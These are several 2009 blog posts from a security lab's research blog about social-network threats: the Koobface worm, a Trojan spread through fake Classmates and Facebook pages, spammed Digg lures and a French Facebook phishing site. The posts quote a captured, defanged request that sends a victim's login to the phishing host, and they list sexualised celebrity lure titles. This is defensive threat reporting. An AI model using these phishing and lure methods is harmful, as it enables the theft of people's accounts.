PandaLabs : Social Networks

Koobface: The saga continues

Sean-Paul Correll — Thu, 13 Aug 2009 22:49:00 GMT

The gang behind the Koobface worm has been hard at work in releasing the next iteration of their worm. We've already identified over 60 active domains spreading the content through the usual method of posting a message linking to a "CooooL Video" on Facebook.

Sample malspam:

After clicking the link, the victims are automatically redirected to a Koobface controlled server, which then routes the them off to a fake codec site specifically designed for the social network they came from.

Fake codec site:

The Koobface gang uses the same old "Flash Player upgrade required" tactic to trick users into opening the executable, which then ultimately transforms their machine into a distribution point for the infection to further propagate.

Koobface connection log:

On infection, the Koobface worm immediately attempts to download three additional exectuable files.

After turning the victims computer into its next distribution point, it also attempts to monetize by installing "Total Security" Rogueware.

Malware Impersonates Classmates and Facebook Websites to Deliver Password Stealing Trojan

Sean-Paul Correll — Thu, 12 Mar 2009 08:38:00 GMT

Websites designed to look like Classmates.com and Facebook are currently being used to distribute a password stealing Trojan, which we detect as Trj/Spyforms.BZ. Some of you may remember the Spyforms Malware family from a previous incident involving Barack Obama spam campaigns. In this most recent incident, the malicious web links are still primarily distributed via spam e-mails. Once clicked, the victim is presented with a realistic looking Classmates or Facebook website. The website contains a fake YouTube video, which prompts a dialog stating “Please Download correct Flash Movie Player! Installation: Double-click the downloaded installer. Follow the on-screen instructions!” and attempts to download a file named Adobemedia10.exe or Adobemedia11.exe.

Once installed, the Trojan intercepts network traffic in order to obtain ftp, icq, pop3, and imap passwords and then sends the data back to a server in a Hong Kong based ISP (HOSTFRESH). You may recall the last major Malware incident involving the Hong Kong based ISP, which was one of the providers involved in the malware distribution operation taking place inside of the Atrivo/Intercage network.

Ever heard the term "Rickrolling"? Malware distributors have...

Sean-Paul Correll — Mon, 09 Feb 2009 10:21:00 GMT

Rickrolling is an Internet meme typically involving the music video for the 1987 Rick Astley song "Never Gonna Give You Up". The meme is a bait and switch: a person provides a web link that he or she claims is relevant to the topic at hand, but the link actually takes the user to the Astley video.

Over the past few months we have noticed attacker efforts to maximize blackhat SEO tactics and increase infection rates at the same time by abusing the popular social news aggregate site Digg.com. Digg allows users to create, vote, and comment on news stories.

Malware distributors have been creating false stories with catchy subject lines as an attempt to bait users into clicking links which lead to Malware. In some cases the attackers do not create the news story themselves, rather linking to others relevant content. Below is an example of the attacker (in red) taking advantage of a valid digg submission. The malicious comment reads, "Heath Ledger naked in the shower, playing with herself." and is posted to a relevant story about Heath Ledger. The "playing with herself" part is a bit confusing but my guess is that the attackers are using automation scripts to auto-generate content based on topic relevancy or that they are manually doing this and have no idea who Heath Ledger is.

My initial search identified 52 accounts posting news stories or comments with malicious URI's. The links all point to various fake codec sites, which lead to rogue anti-malware infections. We detect and block the malware as Adware/VideoPlay.

Update: Dancho Danchev reported that there has been over 500,000 malicious comments posted via Digg since last year.

Some of the titles include:

_{Christian Bale freak out dubbed with video!

Christian Bale Terminator Salvation Takes it Up the Ass

Hot and sexy model Mayuko Lwasa in bikini

Pregnant Ujwala Raut in Bikini

megan fox naked secret videos

Sexy Megan Fox having sex Sex Tape, rally nice and hot video

Megan Fox naked NEW SEX TAPE

Robert Pattinson: fotos, vídeos, história

Jessica Simpson Hotel Sex Tape

Batman is Naked aka Christian Bale

Watch Grey's Anatomy Season 5 online here

Breaks Season 4 Episode 9

Emma Watson Nude Video

Watch Emma Watson Sex Tape online here

Paris Hilton Sex Tape Update

VANESSA ANNE HUDGENS NUDE, NAKED GALLERY, EXCLUSIVE 2009

Naked Truth on Celebrity News and Edison Chen Sex Scandal

Paris Hilton sex tape! Paris Hilton nude, naked movie!

Celebrity and Angelina Jolie nude, naked, in bikini, gallery

Tila Tequila topless nude and naked sex-porn gallery

Alyssa Milano nude, naked, sex tape - free gallery!

BRITNEY SPEARS NUDE, BRITNEY SPEARS NAKED & SEX TAPE (CLICK HERE)

Lindsay Lohan's nude Marilyn shoot

Heath Ledger naked in shower, playing with herself!!}

Fake Codec Sites:

New Version of MS Antispyware 2009

Facebook Phishing Site Targets French Users

Sean-Paul Correll — Thu, 05 Feb 2009 11:18:00 GMT

Today I discovered a new Facebook phishing site targeting French users. The login page looks identical to the official Facebook site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site.

Source:

Connection:

(Passing the victims credentials over to the attacker)

_{GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F}

(Redirecting to the official Facebook login page)

_{302 Moved Temporarily to https://login.facebook.com/login.php}

Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks. The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.

Tips to Avoid Phishing Attacks on Facebook [Facebook Blog]

Remember, Facebook will never ask for your password in an email, Facebook message, or any medium that isn't the login page. Though you will need to re-enter your password when you set a security question, change your contact email, or send a virtual gift.
Be extra aware of weird Wall posts. Don't click on any links—on a Wall or elsewhere—if you don't know where they go.
Set a security question for yourself on your Account page. If somehow something malicious shuts you out of your account, you will need the answer to that question in order for our User Operations team to let you back in. (If you've already set your security question, you won't see a prompt for it on your Account page.)
Be extra aware of what website you are using to log in to Facebook (and other websites). Phishing websites can be made to look like other websites (like the Facebook log in page), and might try to disguise their urls. Be smart: www.facebook.com.profile.a36h8su2m8.info/login starts out looking like a legitimate Facebook website, but that a36h8su2m8.info part means it's fraudulent. Set and use a browser bookmark to make sure you always log in from facebook.com
If you see a Wall post that looks like spam on a friend's Wall, tell the author to delete it and reset their password immediately.
Use a modern web browser to benefit from anti-phishing protection
- Internet Explorer 7
- Firefox
Check out opendns.com. This is another method for blocking specific domains that host phishing sites.

Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.